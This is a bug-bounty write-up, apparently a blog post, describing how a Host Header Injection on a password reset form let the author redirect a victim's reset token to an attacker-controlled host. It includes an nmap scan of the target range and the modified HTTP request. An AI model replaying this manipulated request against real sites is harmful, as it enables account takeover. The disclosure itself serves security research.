How I able to steal password reset token of any user. with severity : “P2”
Hey I’m abhishekmorla, just a beginner in bug hunting.
Here we go:
This article is about a vulnerability (Host Header Injection). I was able to find in the BugCrowd private program. the scope was amazing its range of IP 2xx.xxx.xx.xxx/28
so i quickly scan the range with nmap :
“ nmap -p80 2xx.xxx.xx.xxx/28 -oG — | grep 80/open “
and the result were :
Host: 2xx.xxx.xx.xx1 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx2 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx3 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx4 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx5 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx6 () Ports: 80/open/tcp//http///
I open up some above ips into my browser and one of it redirect to login page. then I clicked on reset password page, where i entered the victim email address.
Post Request:
POST /passwords/forgot HTTP/1.1
Host: mysite.com
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Cookie: _ga=GA1.2.2543534.34543563; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.467456.1568844739; ei_client_id=13423rf46534g…….
I entered the victim’s email and captured the request in Burp. By changing the host to mysite.com, Victim will receive an email with the password reset link.
Response:
HTTP/1.0 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 18 Sep 2020 14:20:51 GMT
Location: https://mysite.com
Server: nginx
Connection: close
That email contains password reset token (shown below) , when victim will click, Attacker can able to get the token, thus resetting the password.
Click on the following link to reset your password:
http://www.mysite.com/passwords/forgot/a248d8b06e7b25a116851234f454yt0d9fb197dadc04f30185512eecc811
and by this way The victim will receive the malicious link in their email, and, when they clicked, will leak the user’s password reset link / token to the attacker(mysite.com) site, leading to full account takeover.
thanks for reading !
LinkedIn : https://www.linkedin.com/in/abhishekmorla/
twitter : https://twitter.com/abhishekmorla
